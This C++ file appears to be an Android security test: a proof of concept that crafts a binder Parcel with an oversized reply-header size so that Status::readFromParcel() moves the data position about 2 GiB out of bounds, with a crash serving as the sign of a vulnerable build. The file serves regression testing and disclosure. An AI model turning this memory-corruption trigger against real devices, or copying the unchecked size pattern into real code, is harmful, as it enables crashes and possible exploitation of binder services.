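/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#include <binder/Parcel.h>
#include <binder/Status.h>

#include <cstdint>
#include <cstdlib>  // EXIT_SUCCESS was used without this header before

using namespace android;
using ::android::binder::Status;

/**
 * Proof of concept for an unchecked reply-header size in
 * android::binder::Status::readFromParcel().
 *
 * The parcel is laid out as [EX_HAS_REPLY_HEADER][header_size]. The
 * vulnerable reader does
 *
 *     const int32_t header_start = parcel.dataPosition();
 *     parcel.setDataPosition(header_start + header_size);
 *
 * where header_start is the position after the first int32, i.e.
 * sizeof(int32_t) == 4, and header_size is read straight from the parcel
 * with no check that it is non-negative or that header_start + header_size
 * stays inside the data actually present. header_size therefore is
 * attacker-controlled: any value greater than INT32_MAX - sizeof(int32_t)
 * makes the int32 addition overflow, and any large value moves the data
 * position far beyond the backing buffer.
 *
 * Returns EXIT_SUCCESS when the process survives. On a vulnerable build the
 * final write is expected to crash (SIGSEGV) instead; the crash is the
 * oracle this PoC relies on, so the return value of readFromParcel() is
 * deliberately not checked.
 */
int main(void) {
    // Largest header_size for which header_start (4) + header_size does NOT
    // overflow int32: the sum is exactly INT32_MAX. Presumably chosen so the
    // PoC itself does not depend on signed-overflow behavior while still
    // pointing ~2 GiB past the 8 bytes this parcel holds. The subtraction is
    // done with explicit int32 operands to avoid the size_t mixed arithmetic
    // and implicit narrowing of the previous `INT32_MAX - sizeof(int32_t)`.
    constexpr int32_t kHeaderSize =
            INT32_MAX - static_cast<int32_t>(sizeof(int32_t));

    Parcel parcel;
    parcel.writeInt32(Status::EX_HAS_REPLY_HEADER);
    parcel.writeInt32(kHeaderSize);
    parcel.setDataPosition(0);

    // A fixed reader is expected to reject the header size (it exceeds the
    // bytes remaining in the parcel) and leave the position alone; an
    // unpatched one calls setDataPosition(INT32_MAX). The status_t result is
    // intentionally ignored, see the header comment.
    Status status;
    status.readFromParcel(parcel);

    // Oracle: if the vulnerability is present the data position is now
    // INT32_MAX, so this write lands far outside the parcel's buffer and the
    // process dies with SIGSEGV. On a patched build the position is still
    // within the written data and the write is harmless.
    parcel.writeInt32(0);
    return EXIT_SUCCESS;
}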